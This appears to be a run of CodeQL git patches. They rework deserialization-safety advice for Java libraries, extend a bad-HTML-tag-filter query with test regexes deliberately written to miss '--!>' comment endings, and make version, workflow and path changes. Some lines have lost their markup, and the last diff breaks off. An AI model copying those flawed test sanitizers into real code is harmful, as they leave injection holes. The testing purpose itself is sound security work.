    ObjectInputStream Java Standard Library NoLeverage a validating input stream like org.apache.commons.io.serialization.ValidatingObjectInputStream.Use a validating input stream, such as org.apache.commons.io.serialization.ValidatingObjectInputStream.
    FastJson com.alibaba:fastjson PartiallyCall com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true.Call com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true before deserializing untrusted data.
    SnakeYAML org.yaml:snakeyaml No (maintainer response)Instantiate the org.yaml.snakeyaml.Yaml instance explicitly with an instance of org.yaml.snakeyaml.constructor.SafeConstructor as an argument.Pass an instance of org.yaml.snakeyaml.constructor.SafeConstructor to org.yaml.snakeyaml.Yaml's constructor before using it to deserialize untrusted data.
    FasterXML jackson-databind com.fasterxml.jackson.core:jackson-databind Yes - Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with com.fasterxml.jackson.annotation.JsonTypeInfo passing either the CLASS or MINIMAL_CLASS values to the annotation. + Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with @JsonTypeInfo(CLASS) or @JsonTypeInfo(MINIMAL_CLASS) if untrusted data may be deserialized. Read this guide.
    Kryo com.esotericsoftware:kryo and com.esotericsoftware:kryo5 com.esotericsoftware:kryo >= 5.0.0 and com.esotericsoftware:kryo5 YesDon't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false.Don't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false on any Kryo instance that may deserialize untrusted data.
    From 4c1c12dd70198906fe547a76f3dc26322e6807c9 Mon Sep 17 00:00:00 2001 From: Florin Coada Date: Mon, 9 Jan 2023 19:31:15 +0000 Subject: [PATCH 167/381] suggestions in list format --- .../CWE/CWE-502/UnsafeDeserialization.qhelp | 86 ++++++++----------- 1 file changed, 37 insertions(+), 49 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp index aa421154d1e..c991e037791 100644 --- a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp +++ b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp @@ -37,55 +37,43 @@ protection measures.

    Recommendations specific to particular frameworks supported by this query:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ProjectMaven CoordinatesSecure by DefaultRecommendation
    XMLDecoderJava Standard LibraryNoDo not use with untrusted user input.
    ObjectInputStreamJava Standard LibraryNoUse a validating input stream, such as org.apache.commons.io.serialization.ValidatingObjectInputStream.
    FastJsoncom.alibaba:fastjsonPartiallyCall com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true before deserializing untrusted data.
    SnakeYAMLorg.yaml:snakeyamlNo (maintainer response)Pass an instance of org.yaml.snakeyaml.constructor.SafeConstructor to org.yaml.snakeyaml.Yaml's constructor before using it to deserialize untrusted data.
    FasterXML jackson-databindcom.fasterxml.jackson.core:jackson-databindYes - Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with @JsonTypeInfo(CLASS) or @JsonTypeInfo(MINIMAL_CLASS) if untrusted data may be deserialized. - Read this guide. -
    Kryocom.esotericsoftware:kryo and com.esotericsoftware:kryo5com.esotericsoftware:kryo >= 5.0.0 and com.esotericsoftware:kryo5 YesDon't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false on any Kryo instance that may deserialize untrusted data.
    +

    FastJson - com.alibaba:fastjson

    +
      +
    • Secure by Default: Partially
      • +
    • Recommendation: Call com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true before deserializing untrusted data.
      • +
    +

    +

    FasterXML - com.fasterxml.jackson.core:jackson-databind

    +
      +
    • Secure by Default: Yes
      • +
    • Recommendation: Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with com.fasterxml.jackson.annotation.JsonTypeInfo passing either the CLASS or MINIMAL_CLASS values to the annotation. + Read this guide.
      • +
    +

    +

    Kryo - com.esotericsoftware:kryo and com.esotericsoftware:kryo5

    +
      +
    • Secure by Default: Yes for com.esotericsoftware:kryo5 and for com.esotericsoftware:kryo >= v5.0.0
      • +
    • Recommendation: Don't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false on any Kryo instance that may deserialize untrusted data.
      • +
    +

    +

    ObjectInputStream - Java Standard Library

    +
      +
    • Secure by Default: No
      • +
    • Recommendation: Use a validating input stream, such as org.apache.commons.io.serialization.ValidatingObjectInputStream.
      • +
    +

    +

    SnakeYAML - org.yaml:snakeyaml

    +
      +
    • Secure by Default: No
      • +
    • Recommendation: Pass an instance of org.yaml.snakeyaml.constructor.SafeConstructor to org.yaml.snakeyaml.Yaml's constructor before using it to deserialize untrusted data.
      • +
    +

    +

    XML Decoder - Standard Java Library

    +
      +
    • Secure by Defauly: No
      • +
    • Recommendation: Do not use with untrusted user input.
      • +
    +

    From 38ca68febb941571a547fdefff4699ed6d459b8e Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 10 Jan 2023 09:20:21 +0100 Subject: [PATCH 168/381] recognize "-->" as a bad tag filter --- .../BadTagFilter/BadTagFilter.expected | 1 + .../Security/CWE-116/BadTagFilter/tst.js | 7 +++++++ .../codeql/regex/nfa/BadTagFilterQuery.qll | 20 +++++++++++++++---- 3 files changed, 24 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.expected b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.expected index 3d1c86b7b04..675ac7f6f83 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.expected @@ -15,3 +15,4 @@ | tst.js:20:3:20:57 | (<[a-z\\/!$]("[^"]*"\|'[^']*'\|[^'">])*>\|) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 3 and comments ending with --!> are matched with capture group 1. | | tst.js:21:6:21:249 | <(?:(?:!--([\\w\\W]*?)-->)\|(?:!\\[CDATA\\[([\\w\\W]*?)\\]\\]>)\|(?:!DOCTYPE([\\w\\W]*?)>)\|(?:\\?([^\\s\\/<>]+) ?([\\w\\W]*?)[?/]>)\|(?:\\/([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)>)\|(?:([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)((?:\\s+[^"'>]+(?:(?:"[^"]*")\|(?:'[^']*')\|[^>]*))*\|\\/\|\\s+)>)) | This regular expression only parses --> (capture group 1) and not --!> as an HTML comment end tag. | | tst.js:22:6:22:33 | \|<([^>]*?)> | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 1 and comments ending with --!> are matched with capture group 2. | +| tst.js:31:6:31:8 | --> | This regular expression only parses --> and not --!> as a HTML comment end tag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 2b71107e512..5b294adae1b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -26,3 +26,10 @@ doFilters(filters) var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used with the ignorecase flag new RegExp(strip, 'gi'); + +var moreFilters = [ + /-->/g, // NOT OK - doesn't match --!> + /^>|^->||--!>| { RootTerm root, string str, boolean ignorePrefix, boolean testWithGroups ) { // the regexp must mention "<" and ">" explicitly. - forall(string angleBracket | angleBracket = ["<", ">"] | - any(RegExpConstant term | term.getValue().matches("%" + angleBracket + "%")).getRootTerm() = - root + ( + forall(string angleBracket | angleBracket = ["<", ">"] | + any(RegExpConstant term | term.getValue().matches("%" + angleBracket + "%")).getRootTerm() = + root + ) + or + // or contain "-->" / "--!>" / "<--" / "", "--!>", "<--", "", "--!>", "--" ] and testWithGroups = false ) @@ -107,6 +113,12 @@ module Make { ") and not --!> as an HTML comment end tag." ) or + // CVE-2021-4231 - matching only "-->" but not "--!>". + regexp.matches("-->") and + not regexp.matches("--!>") and + not regexp.matches("--") and + msg = "This regular expression only parses --> and not --!> as a HTML comment end tag." + or regexp.matches("") and not regexp.matches("") and not regexp.matches("") and From dc88bdccc78b6579496aa910e638e60f00a9e598 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Tue, 10 Jan 2023 21:04:31 +0000 Subject: [PATCH 169/381] JS: Bump patch version of ML-powered library and query packs --- .../ql/experimental/adaptivethreatmodeling/lib/qlpack.yml | 2 +- .../ql/experimental/adaptivethreatmodeling/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml b/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml index 3cf9c6bb727..c929118886d 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml +++ b/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-experimental-atm-lib -version: 0.4.4 +version: 0.4.5 extractor: javascript library: true groups: diff --git a/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml b/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml index bded7e9f770..b3077891878 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml +++ b/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml @@ -1,6 +1,6 @@ name: codeql/javascript-experimental-atm-queries language: javascript -version: 0.4.4 +version: 0.4.5 suites: codeql-suites defaultSuiteFile: codeql-suites/javascript-atm-code-scanning.qls groups: From 76e121e3598106571b0fb39d7875455c9320f6b5 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Tue, 10 Jan 2023 21:11:23 +0000 Subject: [PATCH 170/381] JS: Bump version of ML-powered library and query packs to 0.4.6 --- .../ql/experimental/adaptivethreatmodeling/lib/qlpack.yml | 2 +- .../ql/experimental/adaptivethreatmodeling/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml b/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml index c929118886d..bb438789364 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml +++ b/javascript/ql/experimental/adaptivethreatmodeling/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-experimental-atm-lib -version: 0.4.5 +version: 0.4.6 extractor: javascript library: true groups: diff --git a/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml b/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml index b3077891878..55db320ce03 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml +++ b/javascript/ql/experimental/adaptivethreatmodeling/src/qlpack.yml @@ -1,6 +1,6 @@ name: codeql/javascript-experimental-atm-queries language: javascript -version: 0.4.5 +version: 0.4.6 suites: codeql-suites defaultSuiteFile: codeql-suites/javascript-atm-code-scanning.qls groups: From 181a711f045012f91f06565e77ba43a633304f97 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 10 Jan 2023 21:06:03 -0500 Subject: [PATCH 171/381] Java: switch Collectors.joining model from neutral to summary --- java/ql/lib/ext/java.util.stream.model.yml | 2 +- java/ql/test/ext/TestModels/Test.java | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index aae79ed57ac..7df9272f4be 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -9,6 +9,7 @@ extensions: - ["java.util.stream", "BaseStream", True, "sequential", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.util.stream", "BaseStream", True, "spliterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.util.stream", "BaseStream", True, "unordered", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] + - ["java.util.stream", "Collectors", False, "joining", "(CharSequence)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util.stream", "Stream", True, "allMatch", "(Predicate)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.util.stream", "Stream", True, "anyMatch", "(Predicate)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.util.stream", "Stream", True, "collect", "(Supplier,BiConsumer,BiConsumer)", "", "Argument[-1].Element", "Argument[1].Parameter[1]", "value", "manual"] @@ -92,7 +93,6 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] - ["java.util.stream", "Collectors", "toList", "()", "manual"] - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] - ["java.util.stream", "Collectors", "toSet", "()", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 0b29879d907..7be2728b190 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -11,6 +11,7 @@ import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Function; import java.util.function.Supplier; +import java.util.stream.Collectors; public class Test { @@ -128,6 +129,9 @@ public class Test { AtomicReference ar = new AtomicReference(source()); sink(ar.get()); // $hasValueFlow + // java.util.stream + sink(Collectors.joining((CharSequence)source())); // $hasTaintFlow + // java.util.concurrent CountDownLatch cdl = new CountDownLatch((int)source()); sink(cdl.getCount()); // $hasValueFlow From ecf568629bc3fa613cebde7beda35c35f7cab573 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 11 Jan 2023 09:41:16 +0100 Subject: [PATCH 172/381] Add ExprAggregate as a negative edge in getConjunctionParentRec --- ql/ql/src/codeql_ql/style/ConjunctionParent.qll | 1 + .../queries/style/OmittableExists/OmittableExists.expected | 2 +- ql/ql/test/queries/style/OmittableExists/Test.qll | 4 ++++ 3 files changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/ql/src/codeql_ql/style/ConjunctionParent.qll b/ql/ql/src/codeql_ql/style/ConjunctionParent.qll index f3b96f18b11..c39d6d2cb71 100644 --- a/ql/ql/src/codeql_ql/style/ConjunctionParent.qll +++ b/ql/ql/src/codeql_ql/style/ConjunctionParent.qll @@ -28,6 +28,7 @@ module ConjunctionParent { not result instanceof Implication and not result instanceof Negation and not result instanceof Predicate and + not result instanceof ExprAggregate and not result instanceof FullAggregate and not result instanceof Forex and not result instanceof Forall diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected index 7062471b7fb..a0e093c7405 100644 --- a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected @@ -1 +1 @@ -| Test.qll:18:10:18:14 | i | This exists variable can be omitted by using a don't-care expression $@. | Test.qll:18:29:18:29 | i | in this argument | +| Test.qll:20:10:20:14 | i | This exists variable can be omitted by using a don't-care expression $@. | Test.qll:20:29:20:29 | i | in this argument | diff --git a/ql/ql/test/queries/style/OmittableExists/Test.qll b/ql/ql/test/queries/style/OmittableExists/Test.qll index f9809b9d485..fc020742b85 100644 --- a/ql/ql/test/queries/style/OmittableExists/Test.qll +++ b/ql/ql/test/queries/style/OmittableExists/Test.qll @@ -6,6 +6,8 @@ predicate yetAnotherPredicate(int i, int y) { none() } predicate dbTypePredicate(@location l) { none() } +string predicateWithResult(int i) { none() } + class SmallInt extends int { SmallInt() { this = [0 .. 10] } } @@ -23,6 +25,8 @@ predicate test() { or exists(int i | aPredicate(i) and exists(int i2 | i = i2)) // GOOD or + exists(int i | count(predicateWithResult(i)) = 0) // GOOD + or exists(int i | count(int y | yetAnotherPredicate(i, y)) > 0) // GOOD or exists(int i | forex(int y | yetAnotherPredicate(i, y))) // GOOD From ed2dd87bda573aa543c1763d89ed89756419c4e5 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Wed, 11 Jan 2023 11:12:57 +0100 Subject: [PATCH 173/381] update the codeql-action version used in QL-for-QL --- .github/workflows/ql-for-ql-build.yml | 6 +++--- .github/workflows/ql-for-ql-dataset_measure.yml | 2 +- .github/workflows/ql-for-ql-tests.yml | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/ql-for-ql-build.yml b/.github/workflows/ql-for-ql-build.yml index 29b8bc16300..144c0e7b71a 100644 --- a/.github/workflows/ql-for-ql-build.yml +++ b/.github/workflows/ql-for-ql-build.yml @@ -27,7 +27,7 @@ jobs: uses: ./.github/actions/find-latest-bundle - name: Find codeql id: find-codeql - uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + uses: github/codeql-action/init@45955cb1830b640e2c1603ad72ad542a49d47b96 with: languages: javascript # does not matter tools: ${{ steps.find-latest-bundle.outputs.url }} @@ -137,7 +137,7 @@ jobs: env: CONF: ./ql-for-ql-config.yml - name: Initialize CodeQL - uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + uses: github/codeql-action/init@45955cb1830b640e2c1603ad72ad542a49d47b96 with: languages: ql db-location: ${{ runner.temp }}/db @@ -150,7 +150,7 @@ jobs: PACK: ${{ runner.temp }}/pack - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + uses: github/codeql-action/analyze@45955cb1830b640e2c1603ad72ad542a49d47b96 with: category: "ql-for-ql" - name: Copy sarif file to CWD diff --git a/.github/workflows/ql-for-ql-dataset_measure.yml b/.github/workflows/ql-for-ql-dataset_measure.yml index 41f95a686ba..1b99dbeab2e 100644 --- a/.github/workflows/ql-for-ql-dataset_measure.yml +++ b/.github/workflows/ql-for-ql-dataset_measure.yml @@ -25,7 +25,7 @@ jobs: - name: Find codeql id: find-codeql - uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + uses: github/codeql-action/init@45955cb1830b640e2c1603ad72ad542a49d47b96 with: languages: javascript # does not matter - uses: actions/cache@v3 diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index ce7963e8f79..8d4459a34d6 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -22,7 +22,7 @@ jobs: - uses: actions/checkout@v3 - name: Find codeql id: find-codeql - uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + uses: github/codeql-action/init@45955cb1830b640e2c1603ad72ad542a49d47b96 with: languages: javascript # does not matter - uses: actions/cache@v3 From 74a58f64aad2c4f4b7c1b742f6be6387c106d9c3 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Wed, 11 Jan 2023 11:08:12 +0100 Subject: [PATCH 174/381] move queries folder instead of .cache folder now that we got .qlx --- .github/workflows/ql-for-ql-build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ql-for-ql-build.yml b/.github/workflows/ql-for-ql-build.yml index 144c0e7b71a..30c15e035a3 100644 --- a/.github/workflows/ql-for-ql-build.yml +++ b/.github/workflows/ql-for-ql-build.yml @@ -145,7 +145,7 @@ jobs: tools: ${{ steps.find-latest-bundle.outputs.url }} - name: Move pack cache run: | - cp -r ${PACK}/.cache ql/ql/src/.cache + cp -r ${PACK}/queries ql/ql/src env: PACK: ${{ runner.temp }}/pack From 3fa6a7cbffe55051932a4676d2bb5c9548375722 Mon Sep 17 00:00:00 2001 From: Erik Krogh Kristensen Date: Wed, 11 Jan 2023 12:29:15 +0100 Subject: [PATCH 175/381] cache -> queries Co-authored-by: Tony Torralba --- .github/workflows/ql-for-ql-build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ql-for-ql-build.yml b/.github/workflows/ql-for-ql-build.yml index 30c15e035a3..393974acab8 100644 --- a/.github/workflows/ql-for-ql-build.yml +++ b/.github/workflows/ql-for-ql-build.yml @@ -143,7 +143,7 @@ jobs: db-location: ${{ runner.temp }}/db config-file: ./ql-for-ql-config.yml tools: ${{ steps.find-latest-bundle.outputs.url }} - - name: Move pack cache + - name: Move pack queries run: | cp -r ${PACK}/queries ql/ql/src env: From 178fd0e9e151674f86c34f2d59c2d2b9c1e5e05f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 20 Dec 2022 13:39:36 +0100 Subject: [PATCH 176/381] C#/Java: Remove all dashes in mode-generator. --- .github/workflows/mad_modelDiff.yml | 4 ++-- .github/workflows/mad_regenerate-models.yml | 2 +- .../utils/model-generator/CaptureDiscardedSummaryModels.ql | 2 +- csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql | 4 ++-- csharp/ql/src/utils/model-generator/CaptureSinkModels.ql | 4 ++-- csharp/ql/src/utils/model-generator/CaptureSourceModels.ql | 4 ++-- csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql | 4 ++-- .../utils/model-generator/CaptureTypeBasedSummaryModels.ql | 4 ++-- .../utils/model-generator/dataflow/CaptureNeutralModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSinkModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSourceModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSummaryModels.qlref | 2 +- .../typebasedflow/CaptureTypeBasedSummaryModels.qlref | 2 +- java/ql/src/utils/model-generator/CaptureNeutralModels.ql | 4 ++-- java/ql/src/utils/model-generator/CaptureSinkModels.ql | 4 ++-- java/ql/src/utils/model-generator/CaptureSourceModels.ql | 4 ++-- java/ql/src/utils/model-generator/CaptureSummaryModels.ql | 4 ++-- .../utils/model-generator/CaptureTypeBasedSummaryModels.ql | 4 ++-- java/ql/src/utils/model-generator/RegenerateModels.py | 2 +- .../utils/model-generator/dataflow/CaptureNeutralModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSinkModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSourceModels.qlref | 2 +- .../utils/model-generator/dataflow/CaptureSummaryModels.qlref | 2 +- misc/scripts/models-as-data/generate_flow_model.py | 2 +- misc/suite-helpers/code-scanning-selectors.yml | 2 +- misc/suite-helpers/security-and-quality-selectors.yml | 2 +- misc/suite-helpers/security-extended-selectors.yml | 2 +- 27 files changed, 38 insertions(+), 38 deletions(-) diff --git a/.github/workflows/mad_modelDiff.yml b/.github/workflows/mad_modelDiff.yml index 586b1576bd6..2affe5f3bd7 100644 --- a/.github/workflows/mad_modelDiff.yml +++ b/.github/workflows/mad_modelDiff.yml @@ -11,7 +11,7 @@ on: branches: - main paths: - - "java/ql/src/utils/model-generator/**/*.*" + - "java/ql/src/utils/modelgenerator/**/*.*" - ".github/workflows/mad_modelDiff.yml" permissions: @@ -61,7 +61,7 @@ jobs: DATABASE=$2 cd codeql-$QL_VARIANT SHORTNAME=`basename $DATABASE` - python java/ql/src/utils/model-generator/GenerateFlowModel.py --with-summaries --with-sinks $DATABASE ${SHORTNAME}.temp.model.yml + python java/ql/src/utils/modelgenerator/GenerateFlowModel.py --with-summaries --with-sinks $DATABASE ${SHORTNAME}.temp.model.yml mv java/ql/lib/ext/generated/${SHORTNAME}.temp.model.yml $MODELS/${SHORTNAME}Generated_${QL_VARIANT}.model.yml cd .. } diff --git a/.github/workflows/mad_regenerate-models.yml b/.github/workflows/mad_regenerate-models.yml index d92e3652d5c..6b3d0347a86 100644 --- a/.github/workflows/mad_regenerate-models.yml +++ b/.github/workflows/mad_regenerate-models.yml @@ -50,7 +50,7 @@ jobs: SLUG: ${{ matrix.slug }} run: | SHORTNAME=${SLUG//[^a-zA-Z0-9_]/} - java/ql/src/utils/model-generator/RegenerateModels.py "${SLUG}" dbs/${SHORTNAME} + java/ql/src/utils/modelgenerator/RegenerateModels.py "${SLUG}" dbs/${SHORTNAME} - name: Stage changes run: | find java -name "*.model.yml" -print0 | xargs -0 git add diff --git a/csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql b/csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql index 695a928e2f8..9e71580b552 100644 --- a/csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureDiscardedSummaryModels.ql @@ -1,7 +1,7 @@ /** * @name Capture discarded summary models. * @description Finds summary models that are discarded as handwritten counterparts exist. - * @id cs/utils/model-generator/discarded-summary-models + * @id cs/utils/modelgenerator/discarded-summary-models */ import semmle.code.csharp.dataflow.ExternalFlow diff --git a/csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql b/csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql index 9cf2b81ba7c..a7e4be6ff2e 100644 --- a/csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureNeutralModels.ql @@ -2,8 +2,8 @@ * @name Capture neutral models. * @description Finds neutral models to be used by other queries. * @kind diagnostic - * @id cs/utils/model-generator/neutral-models - * @tags model-generator + * @id cs/utils/modelgenerator/neutral-models + * @tags modelgenerator */ import semmle.code.csharp.dataflow.ExternalFlow diff --git a/csharp/ql/src/utils/model-generator/CaptureSinkModels.ql b/csharp/ql/src/utils/model-generator/CaptureSinkModels.ql index 68b3ec91974..c19971b098a 100644 --- a/csharp/ql/src/utils/model-generator/CaptureSinkModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureSinkModels.ql @@ -2,8 +2,8 @@ * @name Capture sink models. * @description Finds public methods that act as sinks as they flow into a known sink. * @kind diagnostic - * @id cs/utils/model-generator/sink-models - * @tags model-generator + * @id cs/utils/modelgenerator/sink-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/csharp/ql/src/utils/model-generator/CaptureSourceModels.ql b/csharp/ql/src/utils/model-generator/CaptureSourceModels.ql index 9c3c87d8251..913624e315a 100644 --- a/csharp/ql/src/utils/model-generator/CaptureSourceModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureSourceModels.ql @@ -2,8 +2,8 @@ * @name Capture source models. * @description Finds APIs that act as sources as they expose already known sources. * @kind diagnostic - * @id cs/utils/model-generator/source-models - * @tags model-generator + * @id cs/utils/modelgenerator/source-models + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureModels diff --git a/csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql b/csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql index 0dd22e3babb..eadb7e005f3 100644 --- a/csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureSummaryModels.ql @@ -2,8 +2,8 @@ * @name Capture summary models. * @description Finds applicable summary models to be used by other queries. * @kind diagnostic - * @id cs/utils/model-generator/summary-models - * @tags model-generator + * @id cs/utils/modelgenerator/summary-models + * @tags modelgenerator */ import semmle.code.csharp.dataflow.ExternalFlow diff --git a/csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql b/csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql index f15a786f53f..d2bb7c39826 100644 --- a/csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql +++ b/csharp/ql/src/utils/model-generator/CaptureTypeBasedSummaryModels.ql @@ -2,8 +2,8 @@ * @name Capture typed based summary models. * @description Finds applicable summary models to be used by other queries. * @kind diagnostic - * @id cs/utils/model-generator/summary-models-typed-based - * @tags model-generator + * @id cs/utils/modelgenerator/summary-models-typed-based + * @tags modelgenerator */ import utils.modelgenerator.internal.CaptureTypeBasedSummaryModels diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref b/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref index cb6ef7faa65..851ddc0d294 100644 --- a/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref +++ b/csharp/ql/test/utils/model-generator/dataflow/CaptureNeutralModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureNeutralModels.ql \ No newline at end of file +utils/modelgenerator/CaptureNeutralModels.ql \ No newline at end of file diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref b/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref index c478ac760c4..36d2f144247 100644 --- a/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref +++ b/csharp/ql/test/utils/model-generator/dataflow/CaptureSinkModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSinkModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSinkModels.ql \ No newline at end of file diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref b/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref index 10593c28e92..6bbb499fc27 100644 --- a/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref +++ b/csharp/ql/test/utils/model-generator/dataflow/CaptureSourceModels.qlref @@ -1 +1 @@ -utils/model-generator/CaptureSourceModels.ql \ No newline at end of file +utils/modelgenerator/CaptureSourceModels.ql \ No newline at end of file diff --git a/csharp/ql/test/utils/model-generator/dataflow/CaptureSummaryModels.qlref 